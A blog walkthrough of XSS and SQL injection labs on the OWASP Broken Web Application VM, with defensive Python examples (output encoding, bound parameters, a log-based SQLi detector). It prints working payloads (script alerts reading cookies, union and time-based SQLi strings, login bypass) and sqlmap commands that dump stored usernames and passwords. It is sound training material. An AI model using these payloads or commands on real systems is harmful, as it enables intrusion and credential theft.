Exploring Web Security with OWASP BWA
In this blog post, I’ll take you through my hands-on exploration of common web vulnerabilities using the OWASP Broken Web Application (BWA) virtual machine. This powerful learning environment allows security enthusiasts to practice identifying and exploiting vulnerabilities in a safe, controlled setting.
Setting Up the Environment
To begin, I:
- Imported the OWASP BWA virtual machine into VirtualBox
- Configured the network interface to NAT mode
- Accessed the VM through the exposed IP address

Part 1: Cross-Site Scripting (XSS)
XSS vulnerabilities allow attackers to inject malicious scripts into websites that are then executed by unsuspecting users’ browsers. Let’s work through three XSS exercises: one reflected and two stored.
Reflected XSS in Mutillidae II
Reflected XSS occurs when user input is immediately returned to the browser without proper sanitization.
I navigated to the A3 - XSS tab and selected Reflected (First Order) > DNS Lookup. The page presented a query bar for DNS lookups.

Testing with a legitimate domain like google.com showed the expected behavior:

Then I tried a basic XSS payload:
<script>alert(1)</script>
The server reflected this input without sanitization, allowing the script to execute and trigger the alert:

Stored XSS in WebGoat
Stored XSS is more dangerous as the malicious script is permanently stored on the target server and executes whenever a user accesses the affected page.
First, log in as Tom.

Edit your street field so that it contains the XSS payload. Because this information is persisted on the server, it is known as stored XSS.

After this, log in as Larry.

After logging in, search for Tom’s profile. When you view his profile, the stored XSS is triggered and the alert box pops up.

The lab was successfully completed.

Stored XSS in DVWA
- In DVWA, there is a message board where users can post a Name and a Message. Because these posts are stored and shown to everyone who views the page, this is an interesting place to insert our XSS payload.
- I used the payload below to display this website’s cookies.
<script>alert(document.cookie)</script>

When the page is visited again, this stored XSS is triggered.

The alert displayed the document cookies, demonstrating how an attacker could steal session cookies.
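The three labs above share one root cause: untrusted input (the DNS-lookup parameter, Tom’s street field, the DVWA guestbook message) is written into HTML without encoding. The following Python is an added example, not code from the post or from Mutillidae, WebGoat or DVWA: it models a vulnerable and a fixed version of the reflected lookup page and a minimal stored guestbook, and shows that HTML-encoding at the point of output turns the lab payload into inert text. The function and class names are hypothetical.

```python
import html

# Lab payload from the post: harmless alert, used here only to show the fix works.
PAYLOAD = "<script>alert(1)</script>"


def render_lookup_vulnerable(hostname: str) -> str:
    """Reflected XSS: the query parameter is interpolated into the page verbatim."""
    return f"<p>Results for host: {hostname}</p>"


def render_lookup_fixed(hostname: str) -> str:
    """Same page, but the value is HTML-encoded where it is written into markup.
    quote=True also encodes quotes, so the value is safe inside attributes too."""
    return f"<p>Results for host: {html.escape(hostname, quote=True)}</p>"


class Guestbook:
    """Stored XSS model (WebGoat street field, DVWA message board).

    Entries are stored raw, exactly as the lab applications do; the defence is
    applied on every render, regardless of where the data originally came from.
    """

    def __init__(self) -> None:
        self.entries: list[tuple[str, str]] = []

    def post(self, name: str, message: str) -> None:
        self.entries.append((name, message))

    def render_vulnerable(self) -> str:
        rows = "".join(f"<li><b>{n}</b>: {m}</li>" for n, m in self.entries)
        return f"<ul>{rows}</ul>"

    def render_fixed(self) -> str:
        rows = "".join(
            f"<li><b>{html.escape(n, quote=True)}</b>: {html.escape(m, quote=True)}</li>"
            for n, m in self.entries
        )
        return f"<ul>{rows}</ul>"


def has_live_script_tag(page: str) -> bool:
    """Crude check for the demo: does the rendered markup still contain a <script> tag?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(render_lookup_vulnerable(PAYLOAD))   # script tag survives
    print(render_lookup_fixed(PAYLOAD))        # &lt;script&gt; ... shown as text
    book = Guestbook()
    book.post("attacker", PAYLOAD)
    print(book.render_vulnerable())
    print(book.render_fixed())
```

Encoding on output is the control that matters here; stripping `<script>` on input is not enough because the same data may be rendered into a JavaScript string or an attribute, where different characters are dangerous, and because stored data can arrive from paths that never passed through the input filter.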

Part 2: SQL Injection (SQLi)
SQL injection allows attackers to manipulate database queries, potentially gaining unauthorized access to data or bypassing authentication.
In-band SQLi in DVWA
In this lab, there is a simple query bar where a user ID is to be filled in.

Inserting random characters (.,<>;) into the query bar produced a SQL error, which confirmed the presence of SQL injection in the application:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''<>;''' at line 1
- Using the payload below, we can dump every user present in the DB.
test' OR 1=1 #

- All user IDs matched because, under the hood, it ran a SQL query like the one shown below:
SELECT first_name, surname from db where user_id='test' OR 1=1 #'
This returned every row from the table, because 1=1 is always true and the # comments out the rest of the original query (including the closing quote).
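To make the mechanism concrete, here is an added example in Python (not the DVWA or Mutillidae source) that builds a small in-memory SQLite table standing in for the lab’s user table and runs the same lookup two ways: with string concatenation, as the lab application does, and with a bound parameter. One detail is adapted: SQLite does not treat # as a comment, so the example uses the `-- ` comment form instead of the MySQL-specific # seen in the post. The table contents, column names and function names are constructed for the demo.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the lab's users table (three fabricated rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id TEXT, first_name TEXT, surname TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("1", "admin", "admin"), ("2", "Gordon", "Brown"), ("3", "Hack", "Me")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> list:
    """The input becomes part of the SQL text, so quotes and keywords change the query."""
    query = f"SELECT first_name, surname FROM users WHERE user_id='{user_id}'"
    return conn.execute(query).fetchall()


def lookup_fixed(conn: sqlite3.Connection, user_id: str) -> list:
    """The input is passed as a bound parameter: it is only ever a value, never SQL."""
    return conn.execute(
        "SELECT first_name, surname FROM users WHERE user_id=?", (user_id,)
    ).fetchall()


def probe(conn: sqlite3.Connection, fn, user_id: str) -> tuple:
    """Run a lookup and report ('ok', rows) or ('error', message).

    A stray quote producing a database error is the same signal the post used
    to confirm injection in DVWA and Mutillidae; the fixed function never errors.
    """
    try:
        return ("ok", fn(conn, user_id))
    except sqlite3.Error as exc:
        return ("error", str(exc))


# Same idea as the post's `test' OR 1=1 #`, with SQLite's comment syntax.
TAUTOLOGY = "test' OR 1=1 -- "
STRAY_QUOTE = "test'"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, stray quote:", probe(db, lookup_vulnerable, STRAY_QUOTE))
    print("fixed, stray quote:     ", probe(db, lookup_fixed, STRAY_QUOTE))
    print("vulnerable, tautology:  ", probe(db, lookup_vulnerable, TAUTOLOGY))
    print("fixed, tautology:       ", probe(db, lookup_fixed, TAUTOLOGY))
```

The fixed lookup returns no rows for both inputs because the database is asked for a user whose ID literally is `test'` or `test' OR 1=1 -- `; the parameter never reaches the SQL parser as code. Escaping quotes by hand is a weaker substitute: bound parameters (or an ORM that uses them) are the control to look for in a code review.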
Bypass Authentication in Mutillidae II
- Tried the payload test' in the username field, and it gave a verbose SQL syntax error message.
connect_errno: 0
errno: 1064
error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''test''' at line 1
client_info: 5.1.73
host_info: Localhost via UNIX socket
) Query: SELECT username FROM accounts WHERE username='test''; (0) [Exception]

We can even see the full SQL query that ran in the background. Let’s try to bypass the authentication.

And we are successfully authenticated as an admin user.

Union-based SQL injection in Mutillidae II
There is a page for checking user details where you need to input your username and password. We used the payload admin' # to confirm the SQL injection.
Next, send a sequence of UNION SELECT payloads with an increasing number of null values until the “column number mismatch” error disappears.
' union select null,null,null,null,null,null,null #
One record matched for the union-based payload above. Let’s exploit this further below.

Here’s how we can extract more information about the database using Union-based SQL injection.
' union select null,database(),@@version,null,null,null,null #

Blind SQL via timing in Mutillidae II
Blind SQL injection is used when error messages are suppressed but the vulnerability still exists.
- Retrieve the current database user first.
' UNION SELECT null, CURRENT_USER(), null, null, null, null, null #

The username is mutillidae.
Using a conditional statement, we can ask the target web server a question and return a value that depends on the answer. For example, if we suspect that the current database user is mutillidae, we can ask: are the first 10 letters of the user equal to mutillidae? If yes, return 1; if no, return 0.
' union select null, if (SUBSTRING(current_user(),1,10) = 'mutillidae', 1, 0), null,null, null, null, null #
- Instead of returning 1 or 0, we can ask the web server to wait for a given number of seconds. After running this command, the server waited about 5 seconds before sending a response.
' union select null, case SUBSTRING(current_user(),1,10) WHEN 'mutillidae' THEN SLEEP(5) ELSE SLEEP(0) END, null, null, null, null, null #
- In this way we can exfiltrate the whole database, and other internal files as well (if the DB user has access to them).
Part 3: SQLMap
Use BurpSuite to save the request to a file named mutillidae.req.

Use sqlmap to exploit the SQL injection on this URL:
~/Documents > sqlmap -r mutillidae.req --threads=5 --dbs

The sqlmap attack is successful and here are the available databases it is able to dump for us.

Let’s pick the mutillidae database and issue the following command to see the tables associated with it (-D specifies a database, --tables lists all tables within that database):
~/Documents > sqlmap -r mutillidae.req --threads=5 -D mutillidae --tables

- Let’s find the columns available in the accounts table.
sqlmap -r mutillidae.req --threads=5 -D mutillidae -T accounts --columns

- Now it’s time to dump all the usernames and passwords in this table using the following command:
sqlmap -r mutillidae.req --threads=5 -D mutillidae -T accounts -C username,password --dump
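From the defender’s side, every request in Part 2 and Part 3 leaves a trace in the web server’s access log. The following Python is an added example (not part of the post and not a sqlmap feature): it parses a handful of constructed Apache combined-format log lines that replay the lab’s own URLs and payloads, decodes the query parameters, and flags the patterns a reviewer would expect to see from the union-based, time-based and tautology payloads above, plus sqlmap’s default User-Agent, which begins with "sqlmap/". Timestamps, response sizes, the sqlmap version string and the rule names are all constructed.

```python
import re
from dataclasses import dataclass
from urllib.parse import parse_qs, urlsplit

# Constructed log lines modelled on the lab traffic in this post (fabricated
# timestamps, sizes and sqlmap version). Not captured from the VM.
SAMPLE_LOG = """\
10.0.2.15 - - [01/May/2024:10:00:01 +0000] "GET /mutillidae/index.php?page=dns-lookup.php&target_host=google.com HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.2.15 - - [01/May/2024:10:00:07 +0000] "GET /dvwa/vulnerabilities/sqli/?id=test%27+OR+1%3D1+%23&Submit=Submit HTTP/1.1" 200 4821 "-" "Mozilla/5.0"
10.0.2.15 - - [01/May/2024:10:00:12 +0000] "GET /mutillidae/index.php?page=user-info.php&username=%27+union+select+null%2Cdatabase%28%29%2C%40%40version%2Cnull%2Cnull%2Cnull%2Cnull+%23 HTTP/1.1" 200 6011 "-" "Mozilla/5.0"
10.0.2.15 - - [01/May/2024:10:00:20 +0000] "GET /mutillidae/index.php?page=user-info.php&username=%27+union+select+null%2C+case+SUBSTRING%28current_user%28%29%2C1%2C10%29+WHEN+%27mutillidae%27+THEN+SLEEP%285%29+ELSE+SLEEP%280%29+END%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull+%23 HTTP/1.1" 200 6011 "-" "Mozilla/5.0"
10.0.2.15 - - [01/May/2024:10:01:02 +0000] "GET /mutillidae/index.php?page=user-info.php&username=admin HTTP/1.1" 200 5980 "-" "sqlmap/1.x#stable (https://sqlmap.org)"
10.0.2.15 - - [01/May/2024:10:01:05 +0000] "GET /dvwa/vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1" 200 4790 "-" "Mozilla/5.0"
"""

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Rules are applied to each *decoded* query-parameter value, never to the raw URL,
# so URL encoding and '+' for space cannot hide the pattern.
PARAM_RULES = {
    "union-select": re.compile(r"union\s+(all\s+)?select", re.I),
    "tautology": re.compile(r"\bor\s+1\s*=\s*1\b", re.I),
    "time-based": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "db-fingerprint": re.compile(r"@@version|\bdatabase\s*\(|current_user\s*\(", re.I),
    "comment-terminator": re.compile(r"(#|--)\s*$"),
}
SCANNER_UA_PREFIXES = ("sqlmap/",)  # sqlmap's default User-Agent starts this way


@dataclass
class Alert:
    line: int
    rule: str
    param: str
    value: str


def scan(log_text: str) -> list[Alert]:
    """Return one Alert per (line, rule, parameter) hit; lines that do not parse are skipped."""
    alerts: list[Alert] = []
    for lineno, raw in enumerate(log_text.splitlines(), start=1):
        m = LOG_RE.match(raw)
        if not m:
            continue
        if m["ua"].startswith(SCANNER_UA_PREFIXES):
            alerts.append(Alert(lineno, "sqlmap-user-agent", "User-Agent", m["ua"]))
        params = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        for name, values in params.items():
            for value in values:
                for rule, rx in PARAM_RULES.items():
                    if rx.search(value):
                        alerts.append(Alert(lineno, rule, name, value))
    return alerts


def lines_with_alerts(log_text: str) -> list[int]:
    return sorted({a.line for a in scan(log_text)})


if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f"line {a.line}: {a.rule} in {a.param!r}: {a.value[:60]}")
```

Two points a practitioner would take from running it: the legitimate lookups (lines 1 and 6) produce no alerts, so the rules are specific enough to be actionable, and the sqlmap hit comes from the User-Agent alone, a header any attacker can change, so it is useful for catching default tooling but must not be the only signal.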

Conclusion
This hands-on exploration of OWASP BWA demonstrates just how vulnerable web applications can be when security is not properly implemented. Cross-site scripting and SQL injection remain among the most common and dangerous web vulnerabilities, allowing attackers to steal data, bypass authentication, and potentially take control of systems.
Hoping to get my hands dirty with other labs inside BWA very soon!

Founder of cybersecnerds.com. Cybersecurity professional with 3+ years experience in offensive web security, cloud security and building systems.
I am a Linux evangelist and highly interested in source-code auditing. You will find me reading InfoSec blogs most of the time.